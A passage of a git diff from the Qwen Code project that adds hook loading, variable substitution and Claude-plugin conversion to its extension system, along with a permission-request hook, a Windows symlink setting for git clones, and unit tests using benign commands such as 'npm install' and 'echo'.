+ additionalContext, + }; + } catch (error) { + // Hook errors should not affect error handling + debugLogger.warn( + `PostToolUseFailure hook error for ${toolName}: ${error instanceof Error ? error.message : String(error)}`, + ); + return {}; + } +} + +/** + * Result of Notification hook execution + */ +export interface NotificationHookResult { + /** Additional context from the hook */ + additionalContext?: string; +} + +/** + * Fire Notification hook via MessageBus + * Called when Qwen Code sends a notification + */ +export async function fireNotificationHook( + messageBus: MessageBus | undefined, + message: string, + notificationType: NotificationType, + title?: string, +): Promise { + if (!messageBus) { + return {}; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message, + notification_type: notificationType, + title, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return {}; + } + + const notificationOutput = createHookOutput( + 'Notification', + response.output, + ); + const additionalContext = notificationOutput.getAdditionalContext(); + + return { + additionalContext, + }; + } catch (error) { + // Notification hook errors should not affect the notification flow + debugLogger.warn( + `Notification hook error: ${error instanceof Error ? error.message : String(error)}`, + ); + return {}; + } +} + +/** + * Result of PermissionRequest hook execution + */ +export interface PermissionRequestHookResult { + /** Whether the hook made a permission decision */ + hasDecision: boolean; + /** If true, the tool execution should proceed */ + shouldAllow?: boolean; + /** Updated tool input to use if allowed */ + updatedInput?: Record; + /** Deny message to pass back to the AI if denied */ + denyMessage?: string; + /** Whether to interrupt the AI after denial */ + shouldInterrupt?: boolean; +} + +/** + * Fire PermissionRequest hook via MessageBus + * Called when a permission dialog is about to be shown to the user. + * Returns a decision that can short-circuit the normal permission flow. + */ +export async function firePermissionRequestHook( + messageBus: MessageBus | undefined, + toolName: string, + toolInput: Record, + permissionMode: string, + permissionSuggestions?: PermissionSuggestion[], +): Promise { + if (!messageBus) { + return { hasDecision: false }; + } + + try { + const response = await messageBus.request< + HookExecutionRequest, + HookExecutionResponse + >( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PermissionRequest', + input: { + tool_name: toolName, + tool_input: toolInput, + permission_mode: permissionMode, + permission_suggestions: permissionSuggestions, + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + + if (!response.success || !response.output) { + return { hasDecision: false }; + } + + const permissionOutput = createHookOutput( + 'PermissionRequest', + response.output, + ) as PermissionRequestHookOutput; + + const decision = permissionOutput.getPermissionDecision(); + if (!decision) { + return { hasDecision: false }; + } + + if (decision.behavior === 'allow') { + return { + hasDecision: true, + shouldAllow: true, + updatedInput: decision.updatedInput, + }; + } + + return { + hasDecision: true, + shouldAllow: false, + denyMessage: decision.message, + shouldInterrupt: decision.interrupt, + }; + } catch (error) { + debugLogger.warn( + `PermissionRequest hook error: ${error instanceof Error ? error.message : String(error)}`, + ); + return { hasDecision: false }; + } +} + +/** + * Append additional context to tool response content + * + * @param content - Original content (string or PartListUnion) + * @param additionalContext - Context to append + * @returns Modified content with context appended + */ +export function appendAdditionalContext( + content: string | PartListUnion, + additionalContext: string | undefined, +): string | PartListUnion { + if (!additionalContext) { + return content; + } + + if (typeof content === 'string') { + return content + '\n\n' + additionalContext; + } + + // For PartListUnion content, append as an additional text part + if (Array.isArray(content)) { + return [...content, { text: additionalContext } as Part]; + } + + // For non-array content that's still PartListUnion, return as-is + return content; +} diff --git a/packages/core/src/core/turn.ts b/packages/core/src/core/turn.ts index 08f379d68..d5675414e 100644 --- a/packages/core/src/core/turn.ts +++ b/packages/core/src/core/turn.ts @@ -43,10 +43,6 @@ export interface ServerTool { params: Record, signal?: AbortSignal, ): Promise; - shouldConfirmExecute( - params: Record, - abortSignal: AbortSignal, - ): Promise; } export enum GeminiEventType { @@ -109,7 +105,6 @@ export interface ToolCallResponseInfo { resultDisplay: ToolResultDisplay | undefined; error: Error | undefined; errorType: ToolErrorType | undefined; - outputFile?: string | undefined; contentLength?: number; } diff --git a/packages/core/src/extension/claude-converter.test.ts b/packages/core/src/extension/claude-converter.test.ts index 502e8196e..c984b17bc 100644 --- a/packages/core/src/extension/claude-converter.test.ts +++ b/packages/core/src/extension/claude-converter.test.ts @@ -17,6 +17,7 @@ import { type ClaudeMarketplacePluginConfig, type ClaudeMarketplaceConfig, } from './claude-converter.js'; +import { HookType } from '../hooks/types.js'; describe('convertClaudeToQwenConfig', () => { it('should convert basic Claude config', () => { @@ -433,4 +434,140 @@ describe('convertClaudePluginPackage', () => { // Clean up fs.rmSync(result.convertedDir, { recursive: true, force: true }); }); + + it('should convert hooks from Claude plugin format to Qwen format with variable substitution', async () => { + // Setup: Create a plugin with hooks in Claude format + const pluginSourceDir = path.join(testDir, 'plugin-with-hooks'); + fs.mkdirSync(pluginSourceDir, { recursive: true }); + + // Create hooks directory with hooks.json in Claude format + const hooksDir = path.join(pluginSourceDir, 'hooks'); + fs.mkdirSync(hooksDir, { recursive: true }); + + const hooksJson = { + hooks: { + PostToolUse: [ + { + matcher: 'post-install-matcher', // Part of HookDefinition + sequential: true, // Part of HookDefinition + description: 'Run after installation', + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, + command: '${CLAUDE_PLUGIN_ROOT}/scripts/post-install.sh', + }, + ], + }, + ], + }, + }; + + fs.writeFileSync( + path.join(hooksDir, 'hooks.json'), + JSON.stringify(hooksJson), + 'utf-8', + ); + + // Create marketplace.json + const marketplaceDir = path.join(pluginSourceDir, '.claude-plugin'); + fs.mkdirSync(marketplaceDir, { recursive: true }); + + const marketplaceConfig: ClaudeMarketplaceConfig = { + name: 'test-marketplace', + owner: { name: 'Test Owner', email: 'test@example.com' }, + plugins: [ + { + name: 'hooks-plugin', + version: '1.0.0', + source: './', + strict: false, + hooks: './hooks/hooks.json', // Reference hooks from file + }, + ], + }; + + fs.writeFileSync( + path.join(marketplaceDir, 'marketplace.json'), + JSON.stringify(marketplaceConfig, null, 2), + 'utf-8', + ); + + // Execute: Convert the plugin + const result = await convertClaudePluginPackage( + pluginSourceDir, + 'hooks-plugin', + ); + + // Verify: The converted config should contain processed hooks + expect(result.config.hooks).toBeDefined(); + expect(result.config.hooks!['PostToolUse']).toHaveLength(1); + // Check that the variable was substituted + expect(result.config.hooks!['PostToolUse']![0].hooks![0].command).toBe( + `${pluginSourceDir}/scripts/post-install.sh`, + ); + + // Clean up converted directory + fs.rmSync(result.convertedDir, { recursive: true, force: true }); + }); + + it('should handle hooks defined directly in marketplace config', async () => { + // Setup: Create a plugin with hooks defined directly in marketplace config + const pluginSourceDir = path.join(testDir, 'direct-hooks-plugin'); + fs.mkdirSync(pluginSourceDir, { recursive: true }); + + // Create marketplace.json with hooks defined directly + const marketplaceDir = path.join(pluginSourceDir, '.claude-plugin'); + fs.mkdirSync(marketplaceDir, { recursive: true }); + + const marketplaceConfig: ClaudeMarketplaceConfig = { + name: 'test-marketplace', + owner: { name: 'Test Owner', email: 'test@example.com' }, + plugins: [ + { + name: 'direct-hooks-plugin', + version: '1.0.0', + source: './', + strict: false, + hooks: { + PreToolUse: [ + { + matcher: '*', // Part of HookDefinition + sequential: true, // Part of HookDefinition + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, + command: 'npm install', + }, + ], + }, + ], + }, + }, + ], + }; + + fs.writeFileSync( + path.join(marketplaceDir, 'marketplace.json'), + JSON.stringify(marketplaceConfig, null, 2), + 'utf-8', + ); + + // Execute: Convert the plugin + const result = await convertClaudePluginPackage( + pluginSourceDir, + 'direct-hooks-plugin', + ); + + // Verify: The converted config should contain the hooks + expect(result.config.hooks).toBeDefined(); + expect(result.config.hooks!['PreToolUse']).toHaveLength(1); + expect(result.config.hooks!['PreToolUse']![0].hooks![0].command).toBe( + 'npm install', + ); + + // Clean up converted directory + fs.rmSync(result.convertedDir, { recursive: true, force: true }); + }); }); diff --git a/packages/core/src/extension/claude-converter.ts b/packages/core/src/extension/claude-converter.ts index 6c333c9aa..ff5ba72a9 100644 --- a/packages/core/src/extension/claude-converter.ts +++ b/packages/core/src/extension/claude-converter.ts @@ -16,6 +16,7 @@ import type { ExtensionInstallMetadata, MCPServerConfig, } from '../config/config.js'; +import type { HookEventName, HookDefinition } from '../hooks/types.js'; import { cloneFromGit, downloadFromGitHubRelease } from './github.js'; import { createHash } from 'node:crypto'; import { copyDirectory } from './gemini-converter.js'; @@ -25,9 +26,121 @@ import { } from '../utils/yaml-parser.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { normalizeContent } from '../utils/textUtils.js'; +import { substituteHookVariables } from './variables.js'; const debugLogger = createDebugLogger('CLAUDE_CONVERTER'); +/** + * Perform variable replacement in all markdown and shell script files of the extension. + * This is done during the conversion phase to avoid modifying files during every extension load. + * @param extensionPath - The path to the extension directory + */ +export function performVariableReplacement(extensionPath: string): void { + // Process markdown files + const mdGlobPattern = '**/*.md'; + const mdGlobOptions = { + cwd: extensionPath, + nodir: true, + }; + + try { + const mdFiles = glob.sync(mdGlobPattern, mdGlobOptions); + + for (const file of mdFiles) { + const filePath = path.join(extensionPath, file); + + try { + const content = fs.readFileSync(filePath, 'utf8'); + + // Replace ${CLAUDE_PLUGIN_ROOT} with the actual extension path + const updatedContent = content.replace( + /\$\{CLAUDE_PLUGIN_ROOT\}/g, + extensionPath, + ); + + // Replace Markdown shell syntax ```! ... ``` with system-recognized !{...} syntax + // This regex finds code blocks with ! language identifier and captures their content + const updatedMdContent = updatedContent.replace( + /```!(?:\s*\n)?([\s\S]*?)\n*```/g, + '!{$1}', + ); + + // Only write if content was actually changed + if (updatedMdContent !== content) { + fs.writeFileSync(filePath, updatedMdContent, 'utf8'); + debugLogger.debug( + `Updated variables and syntax in file: ${filePath}`, + ); + } + } catch (error) { + debugLogger.warn( + `Failed to process file ${filePath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } catch (error) { + debugLogger.warn( + `Failed to scan markdown files in extension directory ${extensionPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + + // Process shell script files + const scriptGlobPattern = '**/*.sh'; + const scriptGlobOptions = { + cwd: extensionPath, + nodir: true, + }; + + try { + const scriptFiles = glob.sync(scriptGlobPattern, scriptGlobOptions); + + for (const file of scriptFiles) { + const filePath = path.join(extensionPath, file); + + try { + const content = fs.readFileSync(filePath, 'utf8'); + + // Replace references to "role":"assistant" with "type":"assistant" in shell scripts + const updatedScriptContent = content.replace( + /"role":"assistant"/g, + '"type":"assistant"', + ); + + // Replace transcript parsing logic to adapt to actual transcript structure + // Change from .message.content | map(select(.type == "text")) to .message.parts | map(select(has("text"))) + const adaptedScriptContent = updatedScriptContent.replace( + /\.message\.content\s*\|\s*map\(select\(\.type\s*==\s*"text"\)\)/g, + '.message.parts | map(select(has("text")))', + ); + + // Replace references to ".claude" directory with ".qwen" in shell scripts + // Only match path references (e.g., ~/.claude/, $HOME/.claude, ./.claude/) + // Avoid matching URLs, comments, or string literals containing .claude + const finalScriptContent = adaptedScriptContent.replace( + /(\$\{?HOME\}?\/|~\/)?\.claude(\/|$)/g, + '$1.qwen$2', + ); + + // Only write if content was actually changed + if (finalScriptContent !== content) { + fs.writeFileSync(filePath, finalScriptContent, 'utf8'); + debugLogger.debug( + `Updated transcript format and replaced .claude with .qwen in shell script: ${filePath}`, + ); + } + } catch (error) { + debugLogger.warn( + `Failed to process shell script file ${filePath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } catch (error) { + debugLogger.warn( + `Failed to scan shell script files in extension directory ${extensionPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } +} + export interface ClaudePluginConfig { name: string; version: string; @@ -40,7 +153,7 @@ export interface ClaudePluginConfig { commands?: string | string[]; agents?: string | string[]; skills?: string | string[]; - hooks?: string; + hooks?: string | { [K in HookEventName]?: HookDefinition[] }; mcpServers?: string | Record; outputStyles?: string | string[]; lspServers?: string | Record; @@ -312,12 +425,21 @@ export function convertClaudeToQwenConfig( } } - // Warn about unsupported fields + // Parse hooks + let hooks: { [K in HookEventName]?: HookDefinition[] } | undefined; if (claudeConfig.hooks) { - debugLogger.warn( - `[Claude Converter] Hooks are not yet supported in ${claudeConfig.name}`, - ); + if (typeof claudeConfig.hooks === 'string') { + // If it's a string, it's a file path, we handle it later in the conversion process + // hooks will be loaded from file path in the convertClaudePluginPackage function + } else { + // Assume it's already in the correct format + hooks = claudeConfig.hooks as { [K in HookEventName]?: HookDefinition[] }; + } + } else { + hooks = undefined; } + + // Warn about unsupported fields if (claudeConfig.outputStyles) { debugLogger.warn( `[Claude Converter] Output styles are not yet supported in ${claudeConfig.name}`, @@ -329,6 +451,7 @@ export function convertClaudeToQwenConfig( version: claudeConfig.version, mcpServers, lspServers: claudeConfig.lspServers, + hooks, // Assign the properly typed hooks variable }; } @@ -461,10 +584,49 @@ export async function convertClaudePluginPackage( // Otherwise, keep the existing folder from pluginSource (default behavior) } + // Step 7: Handle hooks from file paths if needed + if (mergedConfig.hooks && typeof mergedConfig.hooks === 'string') { + const hooksPath = path.isAbsolute(mergedConfig.hooks) + ? mergedConfig.hooks + : path.join(pluginSource, mergedConfig.hooks); + + if (fs.existsSync(hooksPath)) { + try { + const hooksContent = fs.readFileSync(hooksPath, 'utf-8'); + const parsedHooks = JSON.parse(hooksContent); + + // Check if the file has a top-level "hooks" property (like Claude plugins use) + // or if the entire file content is the hooks object + let hooksData; + if (parsedHooks.hooks && typeof parsedHooks.hooks === 'object') { + hooksData = parsedHooks.hooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } else { + // Assume the entire file content is the hooks object + hooksData = parsedHooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } + + // Process the hooks to substitute variables like ${CLAUDE_PLUGIN_ROOT} + mergedConfig.hooks = substituteHookVariables(hooksData, pluginSource); + } catch (error) { + debugLogger.warn( + `Failed to parse hooks file ${hooksPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } + // Step 9.1: Convert collected agent files from Claude format to Qwen format const agentsDestDir = path.join(tmpDir, 'agents'); await convertAgentFiles(agentsDestDir); + // Step 9.2: Perform variable replacement in markdown and shell script files + // This is done during conversion to avoid modifying files during every extension load + performVariableReplacement(tmpDir); + // Step 10: Convert to Qwen format config const qwenConfig = convertClaudeToQwenConfig(mergedConfig); diff --git a/packages/core/src/extension/extensionManager.test.ts b/packages/core/src/extension/extensionManager.test.ts index be94f9056..8ef27da30 100644 --- a/packages/core/src/extension/extensionManager.test.ts +++ b/packages/core/src/extension/extensionManager.test.ts @@ -757,4 +757,139 @@ describe('extension tests', () => { }); }); }); + + describe('hooks loading and processing', () => { + it('should load hooks from qwen-extension.json', async () => { + const extensionDir = path.join(userExtensionsDir, 'hooks-extension'); + fs.mkdirSync(extensionDir, { recursive: true }); + + // Create qwen-extension.json with hooks + const configWithHooks = { + name: 'hooks-extension', + version: '1.0.0', + hooks: { + PreToolUse: [ + { + description: 'Run before tool start', + hooks: [ + { + type: 'command', + command: 'echo "hello"', + }, + ], + }, + ], + }, + }; + + fs.writeFileSync( + path.join(extensionDir, EXTENSIONS_CONFIG_FILENAME), + JSON.stringify(configWithHooks), + ); + + const manager = createExtensionManager(); + await manager.refreshCache(); + const extensions = manager.getLoadedExtensions(); + + expect(extensions).toHaveLength(1); + expect(extensions[0].hooks).toBeDefined(); + expect(extensions[0].hooks!['PreToolUse']).toHaveLength(1); + expect(extensions[0].hooks!['PreToolUse']![0].hooks![0].command).toBe( + 'echo "hello"', + ); + }); + + it('should load hooks from hooks/hooks.json when not in main config', async () => { + const extensionDir = path.join( + userExtensionsDir, + 'hooks-from-file-extension', + ); + fs.mkdirSync(extensionDir, { recursive: true }); + + // Create qwen-extension.json without hooks + const configWithoutHooks = { + name: 'hooks-from-file-extension', + version: '1.0.0', + }; + + fs.writeFileSync( + path.join(extensionDir, EXTENSIONS_CONFIG_FILENAME), + JSON.stringify(configWithoutHooks), + ); + + // Create hooks directory and hooks.json + const hooksDir = path.join(extensionDir, 'hooks'); + fs.mkdirSync(hooksDir, { recursive: true }); + + const hooksJson = { + PostToolUse: [ + { + description: 'Run after install', + hooks: [ + { + type: 'command', + command: `echo "installed in ${extensionDir}"`, + }, + ], + }, + ], + }; + + fs.writeFileSync( + path.join(hooksDir, 'hooks.json'), + JSON.stringify(hooksJson), + ); + + const manager = createExtensionManager(); + await manager.refreshCache(); + const extensions = manager.getLoadedExtensions(); + + expect(extensions).toHaveLength(1); + expect(extensions[0].hooks).toBeDefined(); + expect(extensions[0].hooks!['PostToolUse']).toHaveLength(1); + expect(extensions[0].hooks!['PostToolUse']![0].hooks![0].command).toBe( + `echo "installed in ${extensionDir}"`, + ); + }); + + it('should substitute ${CLAUDE_PLUGIN_ROOT} variable in hooks', async () => { + const extensionDir = path.join(userExtensionsDir, 'hooks-var-extension'); + fs.mkdirSync(extensionDir, { recursive: true }); + + // Create qwen-extension.json with hooks using ${CLAUDE_PLUGIN_ROOT} + const configWithHooks = { + name: 'hooks-var-extension', + version: '1.0.0', + hooks: { + PreToolUse: [ + { + description: 'Run before start with var', + hooks: [ + { + type: 'command', + command: '${CLAUDE_PLUGIN_ROOT}/scripts/setup.sh', + }, + ], + }, + ], + }, + }; + + fs.writeFileSync( + path.join(extensionDir, EXTENSIONS_CONFIG_FILENAME), + JSON.stringify(configWithHooks), + ); + + const manager = createExtensionManager(); + await manager.refreshCache(); + const extensions = manager.getLoadedExtensions(); + + expect(extensions).toHaveLength(1); + expect(extensions[0].hooks).toBeDefined(); + expect(extensions[0].hooks!['PreToolUse']).toHaveLength(1); + expect(extensions[0].hooks!['PreToolUse']![0].hooks![0].command).toBe( + `${extensionDir}/scripts/setup.sh`, + ); + }); + }); }); diff --git a/packages/core/src/extension/extensionManager.ts b/packages/core/src/extension/extensionManager.ts index 3af573ac7..d0382347e 100644 --- a/packages/core/src/extension/extensionManager.ts +++ b/packages/core/src/extension/extensionManager.ts @@ -11,6 +11,7 @@ import type { SubagentConfig, ClaudeMarketplaceConfig, } from '../index.js'; +import type { HookEventName, HookDefinition } from '../hooks/types.js'; import { Storage, Config, @@ -28,6 +29,7 @@ import { EXTENSIONS_CONFIG_FILENAME, INSTALL_METADATA_FILENAME, recursivelyHydrateStrings, + substituteHookVariables, } from './variables.js'; import { resolveEnvVarsInObject } from '../utils/envVarResolver.js'; import { @@ -100,6 +102,7 @@ export interface Extension { commands?: string[]; skills?: SkillConfig[]; agents?: SubagentConfig[]; + hooks?: { [K in HookEventName]?: HookDefinition[] }; } export interface ExtensionConfig { @@ -112,6 +115,7 @@ export interface ExtensionConfig { skills?: string | string[]; agents?: string | string[]; settings?: ExtensionSetting[]; + hooks?: { [K in HookEventName]?: HookDefinition[] }; } export interface ExtensionUpdateInfo { @@ -662,6 +666,50 @@ export class ExtensionManager { `${effectiveExtensionPath}/agents`, ); + if (config.hooks) { + // Process the hooks to substitute variables like ${CLAUDE_PLUGIN_ROOT} + extension.hooks = this.substituteHookVariables( + config.hooks, + effectiveExtensionPath, + ); + } + + // Also load hooks from hooks directory if available and not already set + if (!extension.hooks) { + const hooksDir = path.join(effectiveExtensionPath, 'hooks'); + const hooksJsonPath = path.join(hooksDir, 'hooks.json'); + + if (fs.existsSync(hooksJsonPath)) { + try { + const hooksContent = fs.readFileSync(hooksJsonPath, 'utf-8'); + const parsedHooks = JSON.parse(hooksContent); + + // Check if the file has a top-level "hooks" property or if the entire file content is the hooks object + let hooksData; + if (parsedHooks.hooks && typeof parsedHooks.hooks === 'object') { + hooksData = parsedHooks.hooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } else { + // Assume the entire file content is the hooks object + hooksData = parsedHooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } + + // Process the hooks to substitute variables like ${CLAUDE_PLUGIN_ROOT} + extension.hooks = this.substituteHookVariables( + hooksData, + effectiveExtensionPath, + ); + } catch (error) { + debugLogger.warn( + `Failed to parse hooks file ${hooksJsonPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } + return extension; } catch (e) { debugLogger.warn( @@ -673,6 +721,16 @@ export class ExtensionManager { } } + /** + * Substitute variables in hook configurations, particularly ${CLAUDE_PLUGIN_ROOT} + */ + private substituteHookVariables( + hooks: { [K in HookEventName]?: HookDefinition[] } | undefined, + extensionPath: string, + ): { [K in HookEventName]?: HookDefinition[] } | undefined { + return substituteHookVariables(hooks, extensionPath); + } + loadInstallMetadata( extensionDir: string, ): ExtensionInstallMetadata | undefined { diff --git a/packages/core/src/extension/github.test.ts b/packages/core/src/extension/github.test.ts index 8c31b1284..c197c34fe 100644 --- a/packages/core/src/extension/github.test.ts +++ b/packages/core/src/extension/github.test.ts @@ -56,6 +56,7 @@ describe('git extension helpers', () => { }); it('should clone, fetch and checkout a repo', async () => { + mockPlatform.mockReturnValue('linux'); const installMetadata = { source: 'http://my-repo.com', ref: 'my-ref', @@ -79,6 +80,50 @@ describe('git extension helpers', () => { expect(mockGit.checkout).toHaveBeenCalledWith('FETCH_HEAD'); }); + it('should use core.symlinks=false on Windows to avoid permission errors', async () => { + mockPlatform.mockReturnValue('win32'); + const installMetadata = { + source: 'http://my-repo.com', + ref: 'my-ref', + type: 'git' as const, + }; + const destination = '/dest'; + mockGit.getRemotes.mockResolvedValue([ + { name: 'origin', refs: { fetch: 'http://my-repo.com' } }, + ]); + + await cloneFromGit(installMetadata, destination); + + expect(mockGit.clone).toHaveBeenCalledWith('http://my-repo.com', './', [ + '-c', + 'core.symlinks=false', + '--depth', + '1', + ]); + }); + + it('should use core.symlinks=true on non-Windows platforms', async () => { + mockPlatform.mockReturnValue('darwin'); + const installMetadata = { + source: 'http://my-repo.com', + ref: 'my-ref', + type: 'git' as const, + }; + const destination = '/dest'; + mockGit.getRemotes.mockResolvedValue([ + { name: 'origin', refs: { fetch: 'http://my-repo.com' } }, + ]); + + await cloneFromGit(installMetadata, destination); + + expect(mockGit.clone).toHaveBeenCalledWith('http://my-repo.com', './', [ + '-c', + 'core.symlinks=true', + '--depth', + '1', + ]); + }); + it('should use HEAD if ref is not provided', async () => { const installMetadata = { source: 'http://my-repo.com', diff --git a/packages/core/src/extension/github.ts b/packages/core/src/extension/github.ts index 4fe830e45..e0f448b90 100644 --- a/packages/core/src/extension/github.ts +++ b/packages/core/src/extension/github.ts @@ -75,9 +75,12 @@ export async function cloneFromGit( // We let git handle the source as is. } } + // On Windows, symlinks require elevated privileges by default, so we + // disable them to avoid "Permission denied" errors during checkout. + const symlinkValue = os.platform() === 'win32' ? 'false' : 'true'; await git.clone(sourceUrl, './', [ '-c', - 'core.symlinks=true', + `core.symlinks=${symlinkValue}`, '--depth', '1', ]); diff --git a/packages/core/src/extension/variables.test.ts b/packages/core/src/extension/variables.test.ts index d2015f4f9..e8a1db714 100644 --- a/packages/core/src/extension/variables.test.ts +++ b/packages/core/src/extension/variables.test.ts @@ -5,7 +5,8 @@ */ import { expect, describe, it } from 'vitest'; -import { hydrateString } from './variables.js'; +import { hydrateString, substituteHookVariables } from './variables.js'; +import { HookType } from '../hooks/types.js'; describe('hydrateString', () => { it('should replace a single variable', () => { @@ -16,3 +17,180 @@ describe('hydrateString', () => { expect(result).toBe('Hello, path/my-extension!'); }); }); + +describe('substituteHookVariables', () => { + it('should substitute ${CLAUDE_PLUGIN_ROOT} with the actual path in hooks', () => { + const basePath = '/path/to/plugin'; + + const hooks = { + PreToolUse: [ + { + description: 'Setup before start', + hooks: [ + { + type: HookType.Command, + command: '${CLAUDE_PLUGIN_ROOT}/scripts/setup.sh', + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['PreToolUse']).toHaveLength(1); + expect(result!['PreToolUse']![0].hooks![0].command).toBe( + '/path/to/plugin/scripts/setup.sh', + ); + }); + + it('should handle multiple hooks with variables', () => { + const basePath = '/project/plugins/my-plugin'; + + const hooks = { + PostToolUse: [ + { + description: 'Post install hook 1', + hooks: [ + { + type: HookType.Command, + command: '${CLAUDE_PLUGIN_ROOT}/bin/init.sh', + }, + ], + }, + { + description: 'Post install hook 2', + hooks: [ + { + type: HookType.Command, + command: 'chmod +x ${CLAUDE_PLUGIN_ROOT}/bin/executable.sh', + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['PostToolUse']).toHaveLength(2); + expect(result!['PostToolUse']![0].hooks![0].command).toBe( + '/project/plugins/my-plugin/bin/init.sh', + ); + expect(result!['PostToolUse']![1].hooks![0].command).toBe( + 'chmod +x /project/plugins/my-plugin/bin/executable.sh', + ); + }); + + it('should handle multiple event types with hooks', () => { + const basePath = '/home/user/.qwen/extensions/my-extension'; + + const hooks = { + PreToolUse: [ + { + matcher: 'test-matcher', // Part of HookDefinition + sequential: true, // Part of HookDefinition + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, // HookType.Command + command: '${CLAUDE_PLUGIN_ROOT}/scripts/pre-start.sh', + }, + ], + }, + ], + UserPromptSubmit: [ + { + matcher: 'another-matcher', // Part of HookDefinition + sequential: false, // Part of HookDefinition + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, // HookType.Command + command: '${CLAUDE_PLUGIN_ROOT}/setup/install.py', + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['PreToolUse']).toHaveLength(1); + expect(result!['PreToolUse']![0].hooks![0].command).toBe( + '/home/user/.qwen/extensions/my-extension/scripts/pre-start.sh', + ); + expect(result!['UserPromptSubmit']).toHaveLength(1); + expect(result!['UserPromptSubmit']![0].hooks![0].command).toBe( + '/home/user/.qwen/extensions/my-extension/setup/install.py', + ); + }); + + it('should not modify non-command hooks', () => { + const basePath = '/path/to/extension'; + + const hooks = { + SessionStart: [ + { + matcher: 'test-matcher', // This is part of HookDefinition + sequential: true, // This is part of HookDefinition + hooks: [ + // This is the HookConfig[] array inside HookDefinition + { + type: HookType.Command, // This is part of HookConfig + command: '${CLAUDE_PLUGIN_ROOT}/scripts/run.sh', // This is part of HookConfig + }, + { + type: 'non-command' as HookType.Command, // Non-command type won't be processed + command: '${CLAUDE_PLUGIN_ROOT}/not-affected', // Should not be modified + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['SessionStart']).toHaveLength(1); + expect(result!['SessionStart']![0].hooks![0].command).toBe( + '/path/to/extension/scripts/run.sh', + ); + expect(result!['SessionStart']![0].hooks![1].command).toBe( + '${CLAUDE_PLUGIN_ROOT}/not-affected', + ); // Non-command type won't be processed + }); + + it('should return undefined when hooks is undefined', () => { + const result = substituteHookVariables(undefined, '/some/path'); + expect(result).toBeUndefined(); + }); + + it('should return original hooks when no ${CLAUDE_PLUGIN_ROOT} found', () => { + const basePath = '/path/to/plugin'; + + const hooks = { + Stop: [ + { + matcher: 'test-matcher', // This is part of HookDefinition + sequential: true, // This is part of HookDefinition + hooks: [ + // This is the HookConfig[] array inside HookDefinition + { + type: HookType.Command, // This is part of CommandHookConfig + command: 'echo "hello world"', // This is part of CommandHookConfig + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result).toEqual(hooks); // Should be equal but not the same object (deep clone) + expect(result!['Stop']![0].hooks![0].command).toBe('echo "hello world"'); + }); +}); diff --git a/packages/core/src/extension/variables.ts b/packages/core/src/extension/variables.ts index ccac1c65f..7bdc60d13 100644 --- a/packages/core/src/extension/variables.ts +++ b/packages/core/src/extension/variables.ts @@ -7,6 +7,10 @@ import { type VariableSchema, VARIABLE_SCHEMA } from './variableSchema.js'; import path from 'node:path'; import { QWEN_DIR } from '../config/storage.js'; +import type { HookEventName, HookDefinition } from '../hooks/types.js'; + +// Re-export types for substituteHookVariables +export type { HookEventName, HookDefinition }; export const EXTENSIONS_DIRECTORY_NAME = path.join(QWEN_DIR, 'extensions'); export const EXTENSIONS_CONFIG_FILENAME = 'qwen-extension.json'; @@ -70,3 +74,40 @@ export function recursivelyHydrateStrings( } return obj; } + +/** + * Substitute variables in hook configurations, particularly ${CLAUDE_PLUGIN_ROOT} + * @param hooks - The hooks configuration object + * @param basePath - The path to substitute for ${CLAUDE_PLUGIN_ROOT} + * @returns A deep cloned hooks object with variables substituted + */ +export function substituteHookVariables( + hooks: { [K in HookEventName]?: HookDefinition[] } | undefined, + basePath: string, +): { [K in HookEventName]?: HookDefinition[] } | undefined { + if (!hooks) return hooks; + + // Deep clone the hooks to avoid modifying the original + const clonedHooks = JSON.parse(JSON.stringify(hooks)); + + // Replace ${CLAUDE_PLUGIN_ROOT} with the actual extension path in all command hooks + for (const eventName in clonedHooks) { + const eventHooks = clonedHooks[eventName as HookEventName]; + if (eventHooks && Array.isArray(eventHooks)) { + for (const hookDef of eventHooks) { + if (hookDef.hooks && Array.isArray(hookDef.hooks)) { + for (const hook of hookDef.hooks) { + if (hook.type === 'command' && hook.command) { + hook.command = hook.command.replace( + /\$\{CLAUDE_PLUGIN_ROOT\}/g, + basePath, + ); + } + } + } + } + } + } + + return clonedHooks; +} diff --git a/packages/core/src/hooks/hookAggregator.test.ts b/packages/core/src/hooks/hookAggregator.test.ts index 129713b66..5667d5654 100644 --- a/packages/core/src/hooks/hookAggregator.test.ts +++ b/packages/core/src/hooks/hookAggregator.test.ts @@ -174,12 +174,21 @@ describe('HookAggregator', () => { it('should preserve other hookSpecificOutput fields', () => { const outputs: HookOutput[] = [ { + decision: 'allow', + reason: 'Test reason 1', hookSpecificOutput: { + hookEventName: 'PostToolUse', additionalContext: 'ctx', - tailToolCallRequest: { name: 'A' }, }, }, - { hookSpecificOutput: { additionalContext: 'ctx2' } }, + { + decision: 'allow', + reason: 'Test reason 2', + hookSpecificOutput: { + hookEventName: 